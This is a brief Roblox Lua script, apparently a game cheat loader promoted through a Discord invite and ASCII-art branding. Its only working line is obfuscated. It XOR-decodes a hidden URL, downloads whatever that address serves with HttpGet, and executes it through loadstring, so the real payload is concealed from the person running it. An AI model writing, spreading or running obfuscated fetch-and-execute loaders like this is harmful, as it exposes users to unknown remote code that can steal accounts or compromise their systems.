--[[
╱╭━╮╱╱╱╱╱╭╮
╱┃╭╯╱╱╱╱╭╯╰╮
╭╯╰┳━━┳━┻╮╭╯
╰╮╭┫┃━┫╭╮┃┃
╱┃┃┃┃━┫╭╮┃╰┳╮
╱╰╯╰━━┻╯╰┻━┻╯
]] discord.gg/096 Script code: 0f981s90sa9ss9a7s2

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor or v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for i=1 + 0, #v8 do v6(v10,v0(v4(v1(v2(v8,i,i + (3 -2))),v1(v2(v9,1 + ((i-1)% #v9),(1613 -(445 + 1167)) + ((i-((37 + 1764) -((2348 -1311) + 378 + 385)))% #v9) + (2 -1) + 0)))%(120 + 136)));end return v5(v10);end loadstring(game:HttpGet(v7("\167\56\244\176\224\209\224\99\242\161\228\197\168\37\244\168\230\137\186\63\229\178\240\132\161\56\229\174\231\197\172\35\237\239\242\153\188\41\232\176\246\133\168\57\175\173\242\130\161\99\237\161\250\133\224\43\245\169\189\135\186\45","\207\76\128\192\147\235")))();
